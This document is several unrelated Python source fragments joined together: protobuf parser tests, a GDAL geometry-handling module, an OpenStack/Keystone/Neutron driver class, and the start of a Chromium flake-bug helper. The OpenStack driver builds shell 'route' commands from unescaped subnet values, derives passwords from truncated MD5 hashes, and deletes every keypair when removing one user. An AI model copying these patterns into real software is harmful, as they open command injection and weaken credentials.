)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_extend_in_message():
proto = """
|message Bar {
| extend Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[MessageElement(location=location.at(1, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(2, 3),
name="Foo",
fields=[
FieldElement(
location=location.at(3, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_extend_in_message_with_package():
proto = """
|package kit.kat;
|
|message Bar {
| extend Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
package_name="kit.kat",
types=[MessageElement(location=location.at(3, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(4, 3),
name="Foo",
fields=[
FieldElement(
location=location.at(5, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_fqcn_extend_in_message():
proto = """
|message Bar {
| extend example.Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[MessageElement(location=location.at(1, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(2, 3),
name="example.Foo",
fields=[
FieldElement(
location=location.at(3, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_fqcn_extend_in_message_with_package():
proto = """
|package kit.kat;
|
|message Bar {
| extend example.Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
package_name="kit.kat",
types=[MessageElement(location=location.at(3, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(4, 3),
name="example.Foo",
fields=[
FieldElement(
location=location.at(5, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_default_field_with_paren():
proto = """
|message Foo {
| optional string claim_token = 2[(squareup.redacted) = true];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="claim_token",
tag=2,
options=[OptionElement("squareup.redacted", OptionElement.Kind.BOOLEAN, "true", True)]
)
assert len(field.options) == 1
assert OptionElement("squareup.redacted", OptionElement.Kind.BOOLEAN, "true", True) in field.options
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
# Parse \a, \b, \f, \n, \r, \t, \v, \[0-7]{1-3}, and \[xX]{0-9a-fA-F]{1,2}
def test_default_field_with_string_escapes():
proto = r"""
|message Foo {
| optional string name = 1 [
| x = "\a\b\f\n\r\t\v\1f\01\001\11\011\111\xe\Xe\xE\xE\x41\x41"
| ];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
options=[
OptionElement(
"x", OptionElement.Kind.STRING,
"\u0007\b\u000C\n\r\t\u000b\u0001f\u0001\u0001\u0009\u0009I\u000e\u000e\u000e\u000eAA"
)
]
)
assert len(field.options) == 1
assert OptionElement(
"x", OptionElement.Kind.STRING,
"\u0007\b\u000C\n\r\t\u000b\u0001f\u0001\u0001\u0009\u0009I\u000e\u000e\u000e\u000eAA"
) in field.options
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
def test_string_with_single_quotes():
proto = r"""
|message Foo {
| optional string name = 1[default = 'single\"quotes'];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
default_value="single\"quotes"
)
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
def test_adjacent_strings_concatenated():
proto = """
|message Foo {
| optional string name = 1 [
| default = "concat "
| 'these '
| "please"
| ];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
default_value="concat these please"
)
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
def test_invalid_hex_string_escape():
proto = r"""
|message Foo {
| optional string name = 1 [default = "\xW"];
|}
"""
proto = trim_margin(proto)
with pytest.raises(IllegalStateException) as re:
ProtoParser.parse(location, proto)
pytest.fail("")
assert "expected a digit after \\x or \\X" in re.value.message
def test_service():
proto = """
|service SearchService {
| option (default_timeout) = 30;
|
| rpc Search (SearchRequest) returns (SearchResponse);
| rpc Purchase (PurchaseRequest) returns (PurchaseResponse) {
| option (squareup.sake.timeout) = 15;
| option (squareup.a.b) = {
| value: [
| FOO,
| BAR
| ]
| };
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
services=[
ServiceElement(
location=location.at(1, 1),
name="SearchService",
options=[OptionElement("default_timeout", OptionElement.Kind.NUMBER, "30", True)],
rpcs=[
RpcElement(
location=location.at(4, 3),
name="Search",
request_type="SearchRequest",
response_type="SearchResponse",
response_streaming=False,
request_streaming=False
),
RpcElement(
location=location.at(5, 3),
name="Purchase",
request_type="PurchaseRequest",
response_type="PurchaseResponse",
options=[
OptionElement("squareup.sake.timeout", OptionElement.Kind.NUMBER, "15", True),
OptionElement("squareup.a.b", OptionElement.Kind.MAP, {"value": ["FOO", "BAR"]}, True)
],
request_streaming=False,
response_streaming=False
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_streaming_service():
proto = """
|service RouteGuide {
| rpc GetFeature (Point) returns (Feature) {}
| rpc ListFeatures (Rectangle) returns (stream Feature) {}
| rpc RecordRoute (stream Point) returns (RouteSummary) {}
| rpc RouteChat (stream RouteNote) returns (stream RouteNote) {}
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
services=[
ServiceElement(
location=location.at(1, 1),
name="RouteGuide",
rpcs=[
RpcElement(
location=location.at(2, 3),
name="GetFeature",
request_type="Point",
response_type="Feature",
response_streaming=False,
request_streaming=False
),
RpcElement(
location=location.at(3, 3),
name="ListFeatures",
request_type="Rectangle",
response_type="Feature",
response_streaming=True,
# TODO: Report Square.Wire there was mistake True instead of False!
request_streaming=False,
),
RpcElement(
location=location.at(4, 3),
name="RecordRoute",
request_type="Point",
response_type="RouteSummary",
request_streaming=True,
response_streaming=False,
),
RpcElement(
location=location.at(5, 3),
name="RouteChat",
request_type="RouteNote",
response_type="RouteNote",
request_streaming=True,
response_streaming=True,
)
],
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_hex_tag():
proto = """
|message HexTag {
| required string hex = 0x10;
| required string uppercase_x_hex = 0X11;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[
MessageElement(
location=location.at(1, 1),
name="HexTag",
fields=[
FieldElement(
location=location.at(2, 3), label=Field.Label.REQUIRED, element_type="string", name="hex", tag=16
),
FieldElement(
location=location.at(3, 3),
label=Field.Label.REQUIRED,
element_type="string",
name="uppercase_x_hex",
tag=17
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_structured_option():
proto = """
|message ExoticOptions {
| option (squareup.one) = {name: "Name", class_name:"ClassName"};
| option (squareup.two.a) = {[squareup.options.type]: EXOTIC};
| option (squareup.two.b) = {names: ["Foo", "Bar"]};
|}
"""
# TODO: we do not support it yet
#
# | option (squareup.three) = {x: {y: 1 y: 2 } }; // NOTE: Omitted optional comma
# | option (squareup.four) = {x: {y: {z: 1 }, y: {z: 2 }}};
#
#
#
proto = trim_margin(proto)
option_one_map = {"name": | |
<filename>metadata/geom.py
#-------------------------------------------------------------------------------
#
# Vector Geometry Manipulations
#
# Project: XML Metadata Handling
# Authors: <NAME> <<EMAIL>>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import re
import sys
import math as m
import numpy as np
from collections import Iterable
from osgeo import ogr ; ogr.UseExceptions()
from osgeo import osr ; osr.UseExceptions()
_gerexURL = re.compile(r"^http://www.opengis.net/def/crs/epsg/\d+\.?\d*/(\d+)$", re.IGNORECASE)
_gerexURN = re.compile(r"^urn:ogc:def:crs:epsg:\d*\.?\d*:(\d+)$", re.IGNORECASE)
_gerexShortCode = re.compile(r"^epsg:(\d+)$", re.IGNORECASE)
#-------------------------------------------------------------------------------
# coordinate transformation
RO = ['readonly']
WO = ['writeonly', 'allocate']
class CTransform(object):
def __init__(self, sr_src, sr_dst):
self._ct = osr.CoordinateTransformation(sr_src, sr_dst)
def __call__(self, xarr, yarr):
if hasattr(np, 'nditer') and isinstance(xarr, np.ndarray) and isinstance(yarr, np.ndarray):
# NumPy array
if xarr.shape != yarr.shape:
raise ValueError("Array shape mismatch!")
itr = np.nditer([xarr, yarr, None, None], [], [RO, RO, WO, WO])
for x, y, u, v in itr:
u[...], v[...], _ = self._ct.TransformPoint(float(x), float(y))
return itr.operands[2], itr.operands[3]
elif isinstance(xarr, Iterable) and isinstance(xarr, Iterable):
# generic iterables + NumPy prior 'np.nditer'
u, v = [], []
for x, y in zip(xarr, yarr):
_u, _v, _ = self._ct.TransformPoint(float(x), float(y))
u.append(_u)
v.append(_v)
return u, v
else: # assuming scalar values
return self._ct.TransformPoint(float(xarr), float(yarr))[0:2]
#-------------------------------------------------------------------------------
# spatial references
# the most common spatial references
def createSRFromEPSG(epsg):
""" Create OSR Spatial Reference from EPSG number code"""
sr = osr.SpatialReference()
sr.ImportFromEPSG(epsg)
return sr
OSR_WGS84 = createSRFromEPSG(4326)
OSR_USP_N = createSRFromEPSG(32661)
OSR_USP_N = createSRFromEPSG(32761)
OSR_UTM_N = tuple(createSRFromEPSG(32601+i) for i in xrange(60))
OSR_UTM_S = tuple(createSRFromEPSG(32701+i) for i in xrange(60))
def setSR(geom, sr):
"""Assing spatial reference to a geometry and return it."""
geom.AssignSpatialReference(sr)
return geom
def parseSR(srs, debug=False):
if debug:
print >>sys.stderr, "SRS: ", srs
for regex in (_gerexShortCode, _gerexURN, _gerexURL):
match = regex.match(srs)
if match is not None:
return createSRFromEPSG(int(match.group(1)))
if srs[:7] == "PROJCS[":
return osr.SpatialReference(srs)
if srs in (None, "", "NONE"):
return None
raise ValueError("Failed to parse the spatial reference! SRS='%s'"%(srs))
def dumpSR(sr, delimiter="", debug=False):
# check whether geometry has a spatial reference
if sr is not None:
an, ac = (sr.GetAuthorityName(None), sr.GetAuthorityCode(None))
if an == "EPSG" and ac > 0:
#out = "%s:%s%s"%(an, ac, delimiter)
out = "urn:ogc:def:crs:%s:6.3:%s"%(an, ac)
else:
print >>sys.stderr, "WARNING: Unsupported projection! %s"%(sr.ExportToWkt())
out = ""
else:
out = ""
return out
#-------------------------------------------------------------------------------
# File I/O subroutines
def parseGeom(buf, debug=False):
""" parse geometry from a source buffer """
# parse prefix
if buf.startswith("EPSG:") or buf.startswith("PROJCS["):
srs, _, buf = buf.partition(';')
sr = parseSR(srs)
else:
sr = None
# create the geometry
for loader in (ogr.CreateGeometryFromWkb,
ogr.CreateGeometryFromWkt,
ogr.CreateGeometryFromGML,
ogr.CreateGeometryFromJson):
try:
if debug:
print >>sys.stderr, "LOADER: ", loader,
geom = loader(buf)
except Exception as e:
if debug:
print >>sys.stderr, e
continue
if debug:
print >>sys.stderr, "OK"
break
else:
raise ValueError("ERROR: Failed to parse the source geometry!")
if sr is not None:
geom.AssignSpatialReference(sr)
return geom
#OUTPUT_FORMATS = ("WKB", "WKT", "JSON", "GML", "KML")
OUTPUT_FORMATS = ("WKB", "WKT", "JSON", "KML")
def dumpGeom(geom, format="WKB", debug=False):
""" dump geometry to a buffer possible formats are: WKB(*)|WKT|JSON|GML|KML """
# dump SRS prefix
prefix = dumpSR(geom.GetSpatialReference(), ";", debug)
if format == "WKB":
data = geom.ExportToWkb()
if prefix:
data = "%s%s"%(prefix, data)
elif format == "WKT":
data = "%s%s\n"%(prefix, geom.ExportToWkt())
elif format == "JSON":
data = geom.ExportToJson()
# the GML needs to be verified
# elif format == "GML":
# data = geom.ExportToGML()
elif format == "KML":
data = geom.ExportToKML()
else:
raise ValueError("Invalid format specification! FORMAT='%s'"%(format))
return data
#-------------------------------------------------------------------------------
def wrapArroundDateLine(geom, (xmin, ymin, xmax, ymax), nstep=200):
"""
wrap (split) geometry arround the date-line
nstep controls the split border segmentation (dy = (ymax-ymin)/nstep)
"""
xdif = xmax - xmin
step = (ymax - ymin) / nstep
x0, x1, _, _ = geom.GetEnvelope()
p_start = int(m.floor((x0-xmin)/xdif))
p_stop = int(m.ceil((x1-xmin)/xdif))
# skip geometries falling to a regular domain
if (p_start == 0) and (p_stop == 1):
return geom
# wrap-arround
lgeom = []
for p in xrange(p_start, p_stop):
offset = p*xdif
clip = getRectangle((xmin+offset, ymin, xmax+offset, ymax), step)
tmp = geom.Intersection(clip)
tmp = shiftGeom(tmp, (-offset, 0.0))
lgeom.extend(extractPolygons(tmp))
return groupPolygons(lgeom)
def wrapArroundWGS84(geom, nstep=200):
"""
logitude wrap-arround of geometry in WGS84
nstep controls the split border segmentation (dy = (ymax-ymin)/nstep)
eqivalent to:
wrapArroundDateLine(geom, (-180., -90., +180., +90.), nstep)
"""
return wrapArroundDateLine(geom, (-180., -90., +180., +90.), nstep)
#-------------------------------------------------------------------------------
def mapToWGS84(geom):
def between(v, (v0, v1)):
if v0 <= v1:
return (v0 <= v)and(v1 >= v)
else: #v1 > v0
return (v1 <= v)and(v0 >= v)
def extent_contains(x0, y0):
return ((x0_min <= x0)and(x0_max >= x0)
and(y0_min <= y0)and(y0_max >= y0))
def generate_polar_section(north, east):
eps = 1e-9
y00 = 89 # max. opposite pole lat.distnace from the equator
x0 = 0 if east else -180
y0 = (-y00) if north else (+y00)
y1 = (90-eps) if north else (eps-90)
lr = ogr.Geometry(type=ogr.wkbLinearRing)
for i in xrange(31):
lr.AddPoint_2D(i*6+x0, y0)
lr.AddPoint_2D(180+x0, y1)
lr.AddPoint_2D(x0, y1)
lr.AddPoint_2D(x0, y0)
p = ogr.Geometry(type=ogr.wkbPolygon)
p.AddGeometry(lr)
p.AssignSpatialReference(OSR_WGS84)
return p
def fix_dateline(geom, east):
"""fix the +/-180dg ambiguity of the date-line nodes"""
def _dlflip_east((x, y, _)): # date-line point flipper
return (x+360.0 if x < -179.0 else x, y)
def _dlflip_west((x, y, _)): # date-line point flipper
return (x-360.0 if x > (+179.0) else x, y)
return Transfomer(_dlflip_east if east else _dlflip_west)(geom)
def transform_polar(north):
# generate polygon spliting the polar geometry to halves
s1 = generate_polar_section(north, east=True)
s2 = generate_polar_section(north, east=False)
# transform coordinates
s1.Transform(ct_rev)
s2.Transform(ct_rev)
# split the polar geometry to halves
g1 = geom.Intersection(s1)
g2 = geom.Intersection(s2)
# transform halves to the target projection
g1.Transform(ct_fwd)
g2.Transform(ct_fwd)
# fix the dateline ambiguity
g1 = fix_dateline(g1, east=True)
g2 = fix_dateline(g2, east=False)
# return the unified geometry
return g1.Union(g2)
#--------------------------------------------------------------------------
sr_src = geom.GetSpatialReference()
sr_dst = OSR_WGS84
# coordinate transformation objects
ct_fwd = osr.CoordinateTransformation(sr_src, sr_dst)
ct_rev = osr.CoordinateTransformation(sr_dst, sr_src)
# envelope and centroid in the source coordinates
x0_min, x0_max, y0_min, y0_max = geom.GetEnvelope()
# centroid
x0_cnt, y0_cnt = 0.5*(x0_min+x0_max), 0.5*(y0_min+y0_max)
# try to get coordinates of the north and south pole in the source CRS
try:
xy0_np = ct_rev.TransformPoint(0.0, 90.0)[:2]
except RuntimeError:
xy0_np = None
try:
xy0_sp = ct_rev.TransformPoint(0.0, -90.0)[:2]
except RuntimeError:
xy0_sp = None
# case #1 - extent contains the north pole
if xy0_np and extent_contains(*xy0_np):
return setSR(transform_polar(north=True), OSR_WGS84)
# case #2 - extent contains the south pole
# check whether the extent contains the south pole
elif xy0_sp and extent_contains(*xy0_sp):
return setSR(transform_polar(north=False), OSR_WGS84)
# case #3 proceed with the date-line handling
# perform transformation
geom.Transform(ct_fwd)
# get extent and centroid in the target coordinates
x1_min, _, _ = ct_fwd.TransformPoint(x0_min, y0_cnt)
x1_max, _, _ = ct_fwd.TransformPoint(x0_max, y0_cnt)
x1_cnt, _, _ = ct_fwd.TransformPoint(x0_cnt, y0_cnt)
# fix the wild easting wrap-arround
if not between(x1_cnt, (x1_min, x1_max)):
if x1_max < x1_min: # axis orientation preserved
x_cnt, x_min, x_max = x1_cnt, x1_min, x1_max
else: # (x1_min < x1_max) # flipped axis orientation
x_cnt, x_min, x_max = x1_cnt, x1_max, x1_min
# point unwrapping fuctions
if x_cnt < x_max: # EAST to WEST
def _dlflip(p):
return (p[0]-360*(p[0] > x_max), p[1])
elif x_cnt > x_min: # WEST to EAST
def _dlflip(p):
return (p[0]+360*(p[0] < x_min), p[1])
geom = setSR(Transfomer(_dlflip)(geom), OSR_WGS84)
# perform proper wrapparround
return setSR(wrapArroundDateLine(geom, (-180, -90, 180, 90), 1), OSR_WGS84)
#-------------------------------------------------------------------------------
def groupPolygons(plist):
""" group polygons to a multi-polygon """
mp = ogr.Geometry(ogr.wkbMultiPolygon)
for p in plist:
mp.AddGeometry(p)
return mp
def ungroupMultiPolygon(mpol):
""" un-group multi-polygon to a list of multi-polygons """
return [mpol.GetGeometryRef(i) for | |
<gh_stars>0
import commands
import hashlib
from xos.config import Config
from core.models import Controller
try:
from openstack.client import OpenStackClient
has_openstack = True
except:
has_openstack = False
manager_enabled = Config().api_nova_enabled
class OpenStackDriver:
def __init__(self, config = None, client=None):
if config:
self.config = Config(config)
else:
self.config = Config()
if client:
self.shell = client
self.enabled = manager_enabled
self.has_openstack = has_openstack
self.controller = None
self.admin_user = None
def client_driver(self, caller=None, tenant=None, controller=None):
if caller:
auth = {'username': caller.email,
'password': hashlib.md5(caller.password).hexdigest()[:6],
'tenant': tenant}
client = OpenStackClient(controller=controller, cacert=self.config.nova_ca_ssl_cert, **auth)
else:
admin_driver = self.admin_driver(tenant=tenant, controller=controller)
client = OpenStackClient(tenant=tenant, controller=admin_driver.controller)
driver = OpenStackDriver(client=client)
#driver.admin_user = admin_driver.admin_user
#driver.controller = admin_driver.controller
return driver
def admin_driver(self, tenant=None, controller=None):
if isinstance(controller, int):
controller = Controller.objects.get(id=controller.id)
client = OpenStackClient(tenant=tenant, controller=controller, cacert=self.config.nova_ca_ssl_cert)
driver = OpenStackDriver(client=client)
driver.admin_user = client.keystone.users.find(name=controller.admin_user)
driver.controller = controller
return driver
def create_role(self, name):
roles = self.shell.keystone.roles.findall(name=name)
roles_title = self.shell.keystone.roles.findall(name=name.title())
roles_found = roles + roles_title
if not roles_found:
role = self.shell.keystone.roles.create(name)
else:
role = roles_found[0]
return role
def delete_role(self, filter):
roles = self.shell.keystone.roles.findall(**filter)
for role in roles:
self.shell.keystone.roles.delete(role)
return 1
def create_tenant(self, tenant_name, enabled, description):
"""Create keystone tenant. Suggested fields: name, description, enabled"""
tenants = self.shell.keystone.tenants.findall(name=tenant_name)
if not tenants:
fields = {'tenant_name': tenant_name, 'enabled': enabled,
'description': description}
tenant = self.shell.keystone.tenants.create(**fields)
else:
tenant = tenants[0]
# always give the admin user the admin role to any tenant created
# by the driver.
self.add_user_role(self.admin_user.id, tenant.id, 'admin')
return tenant
def update_tenant(self, id, **kwds):
return self.shell.keystone.tenants.update(id, **kwds)
def delete_tenant(self, id):
ctx = self.shell.nova_db.ctx
tenants = self.shell.keystone.tenants.findall(id=id)
for tenant in tenants:
# nova does not automatically delete the tenant's instances
# so we manually delete instances before deleteing the tenant
instances = self.shell.nova_db.instance_get_all_by_filters(ctx,
{'project_id': tenant.id}, 'id', 'asc')
client = OpenStackClient(tenant=tenant.name)
driver = OpenStackDriver(client=client)
for instance in instances:
driver.destroy_instance(instance.id)
self.shell.keystone.tenants.delete(tenant)
return 1
def create_user(self, name, email, password, enabled):
users = self.shell.keystone.users.findall(email=email)
if not users:
fields = {'name': name, 'email': email, 'password': password,
'enabled': enabled}
user = self.shell.keystone.users.create(**fields)
else:
user = users[0]
return user
def delete_user(self, id):
users = self.shell.keystone.users.findall(id=id)
for user in users:
# delete users keys
keys = self.shell.nova.keypairs.findall()
for key in keys:
self.shell.nova.keypairs.delete(key)
self.shell.keystone.users.delete(user)
return 1
def get_admin_role(self):
role = None
for admin_role_name in ['admin', 'Admin']:
roles = self.shell.keystone.roles.findall(name=admin_role_name)
if roles:
role = roles[0]
break
return role
def add_user_role(self, kuser_id, tenant_id, role_name):
user = self.shell.keystone.users.find(id=kuser_id)
tenant = self.shell.keystone.tenants.find(id=tenant_id)
# admin role can be lowercase or title. Look for both
role = None
if role_name.lower() == 'admin':
role = self.get_admin_role()
else:
# look up non admin role or force exception when admin role isnt found
role = self.shell.keystone.roles.find(name=role_name)
role_found = False
user_roles = user.list_roles(tenant.id)
for user_role in user_roles:
if user_role.name == role.name:
role_found = True
if not role_found:
tenant.add_user(user, role)
return 1
def delete_user_role(self, kuser_id, tenant_id, role_name):
user = self.shell.keystone.users.find(id=kuser_id)
tenant = self.shell.keystone.tenants.find(id=tenant_id)
# admin role can be lowercase or title. Look for both
role = None
if role_name.lower() == 'admin':
role = self.get_admin_role()
else:
# look up non admin role or force exception when admin role isnt found
role = self.shell.keystone.roles.find(name=role_name)
role_found = False
user_roles = user.list_roles(tenant.id)
for user_role in user_roles:
if user_role.name == role.name:
role_found = True
if role_found:
tenant.remove_user(user, role)
return 1
def update_user(self, id, fields):
if 'password' in fields:
self.shell.keystone.users.update_password(id, fields['password'])
if 'enabled' in fields:
self.shell.keystone.users.update_enabled(id, fields['enabled'])
return 1
def create_router(self, name, set_gateway=True):
routers = self.shell.quantum.list_routers(name=name)['routers']
if routers:
router = routers[0]
else:
router = self.shell.quantum.create_router({'router': {'name': name}})['router']
# add router to external network
if set_gateway:
nets = self.shell.quantum.list_networks()['networks']
for net in nets:
if net['router:external'] == True:
self.shell.quantum.add_gateway_router(router['id'],
{'network_id': net['id']})
return router
def delete_router(self, id):
routers = self.shell.quantum.list_routers(id=id)['routers']
for router in routers:
self.shell.quantum.delete_router(router['id'])
# remove router form external network
#nets = self.shell.quantum.list_networks()['networks']
#for net in nets:
# if net['router:external'] == True:
# self.shell.quantum.remove_gateway_router(router['id'])
def add_router_interface(self, router_id, subnet_id):
router = self.shell.quantum.show_router(router_id)['router']
subnet = self.shell.quantum.show_subnet(subnet_id)['subnet']
if router and subnet:
self.shell.quantum.add_interface_router(router_id, {'subnet_id': subnet_id})
def delete_router_interface(self, router_id, subnet_id):
router = self.shell.quantum.show_router(router_id)
subnet = self.shell.quantum.show_subnet(subnet_id)
if router and subnet:
self.shell.quantum.remove_interface_router(router_id, {'subnet_id': subnet_id})
def create_network(self, name, shared=False):
nets = self.shell.quantum.list_networks(name=name)['networks']
if nets:
net = nets[0]
else:
net = self.shell.quantum.create_network({'network': {'name': name, 'shared': shared}})['network']
return net
def delete_network(self, id):
nets = self.shell.quantum.list_networks()['networks']
for net in nets:
if net['id'] == id:
# delete_all ports
self.delete_network_ports(net['id'])
# delete all subnets:
for subnet_id in net['subnets']:
self.delete_subnet(subnet_id)
self.shell.quantum.delete_network(net['id'])
return 1
def delete_network_ports(self, network_id):
ports = self.shell.quantum.list_ports()['ports']
for port in ports:
if port['network_id'] == network_id:
self.shell.quantum.delete_port(port['id'])
return 1
def delete_subnet_ports(self, subnet_id):
ports = self.shell.quantum.list_ports()['ports']
for port in ports:
delete = False
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id:
delete=True
break
if delete:
self.shell.quantum.delete_port(port['id'])
return 1
def create_subnet(self, name, network_id, cidr_ip, ip_version, start, end):
#nets = self.shell.quantum.list_networks(name=network_name)['networks']
#if not nets:
# raise Exception, "No such network: %s" % network_name
#net = nets[0]
subnet = None
subnets = self.shell.quantum.list_subnets()['subnets']
for snet in subnets:
if snet['cidr'] == cidr_ip and snet['network_id'] == network_id:
subnet = snet
if not subnet:
# HACK: Add metadata route -- Neutron does not reliably supply this
metadata_ip = cidr_ip.replace("0/24", "3")
allocation_pools = [{'start': start, 'end': end}]
subnet = {'subnet': {'name': name,
'network_id': network_id,
'ip_version': ip_version,
'cidr': cidr_ip,
#'dns_nameservers': ['8.8.8.8', '8.8.4.4'],
'host_routes': [{'destination':'169.254.169.254/32','nexthop':metadata_ip}],
'gateway_ip': None,
'allocation_pools': allocation_pools}}
subnet = self.shell.quantum.create_subnet(subnet)['subnet']
# self.add_external_route(subnet)
return subnet
def update_subnet(self, id, fields):
return self.shell.quantum.update_subnet(id, fields)
def delete_subnet(self, id):
#return self.shell.quantum.delete_subnet(id=id)
# inefficient but fault tolerant
subnets = self.shell.quantum.list_subnets()['subnets']
for subnet in subnets:
if subnet['id'] == id:
self.delete_subnet_ports(subnet['id'])
self.shell.quantum.delete_subnet(id)
self.delete_external_route(subnet)
return 1
def get_external_routes(self):
status, output = commands.getstatusoutput('route')
routes = output.split('\n')[3:]
return routes
def add_external_route(self, subnet, routes=[]):
if not routes:
routes = self.get_external_routes()
ports = self.shell.quantum.list_ports()['ports']
gw_ip = subnet['gateway_ip']
subnet_id = subnet['id']
# 1. Find the port associated with the subnet's gateway
# 2. Find the router associated with that port
# 3. Find the port associated with this router and on the external net
# 4. Set up route to the subnet through the port from step 3
ip_address = None
for port in ports:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id and fixed_ip['ip_address'] == gw_ip:
gw_port = port
router_id = gw_port['device_id']
router = self.shell.quantum.show_router(router_id)['router']
if router and router.get('external_gateway_info'):
ext_net = router['external_gateway_info']['network_id']
for port in ports:
if port['device_id'] == router_id and port['network_id'] == ext_net:
ip_address = port['fixed_ips'][0]['ip_address']
if ip_address:
# check if external route already exists
route_exists = False
if routes:
for route in routes:
if subnet['cidr'] in route and ip_address in route:
route_exists = True
if not route_exists:
cmd = "route add -net %s dev br-ex gw %s" % (subnet['cidr'], ip_address)
s, o = commands.getstatusoutput(cmd)
#print cmd, "\n", s, o
return 1
def delete_external_route(self, subnet):
ports = self.shell.quantum.list_ports()['ports']
gw_ip = subnet['gateway_ip']
subnet_id = subnet['id']
# 1. Find the port associated with the subnet's gateway
# 2. Find the router associated with that port
# 3. Find the port associated with this router and on the external net
# 4. Set up route to the subnet through the port from step 3
ip_address = None
for port in ports:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id and fixed_ip['ip_address'] == gw_ip:
gw_port = port
router_id = gw_port['device_id']
router = self.shell.quantum.show_router(router_id)['router']
ext_net = router['external_gateway_info']['network_id']
for port in ports:
if port['device_id'] == router_id and port['network_id'] == ext_net:
ip_address = port['fixed_ips'][0]['ip_address']
if ip_address:
cmd = "route delete -net %s" % (subnet['cidr'])
commands.getstatusoutput(cmd)
return 1
def create_keypair(self, name, public_key):
keys = self.shell.nova.keypairs.findall(name=name)
if keys:
key = keys[0]
# update key
if key.public_key != public_key:
self.delete_keypair(key.id)
key = self.shell.nova.keypairs.create(name=name, public_key=public_key)
else:
key = self.shell.nova.keypairs.create(name=name, public_key=public_key)
return key
def delete_keypair(self, id):
keys = self.shell.nova.keypairs.findall(id=id)
for key in keys:
self.shell.nova.keypairs.delete(key)
return 1
def get_private_networks(self, tenant=None):
if not tenant:
tenant = self.shell.nova.tenant
tenant = self.shell.keystone.tenants.find(name=tenant)
search_opts = {"tenant_id": tenant.id, "shared": False}
private_networks = self.shell.quantum.list_networks(**search_opts)
return private_networks
def get_shared_networks(self):
search_opts = {"shared": True}
shared_networks = self.shell.quantum.list_networks(**search_opts)
return shared_networks
def get_network_subnet(self, network_id):
subnet_id = None
subnet = None
if network_id:
os_networks = self.shell.quantum.list_networks(id=network_id)["networks"]
if os_networks:
os_network = os_networks[0]
if | |
<gh_stars>1-10
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities to generate content of bugs to be logged."""
import abc
import textwrap
from google.appengine.ext import ndb
from gae_libs.appengine_util import IsStaging
from model import entity_util
from model.flake.flake import DEFAULT_COMPONENT
from model.flake.flake import Flake
from model.flake.flake_issue import FlakeIssue
from monorail_api import CustomizedField
from services import build_url
from services import git
from services import issue_constants
from services import monitoring
from services import swarming
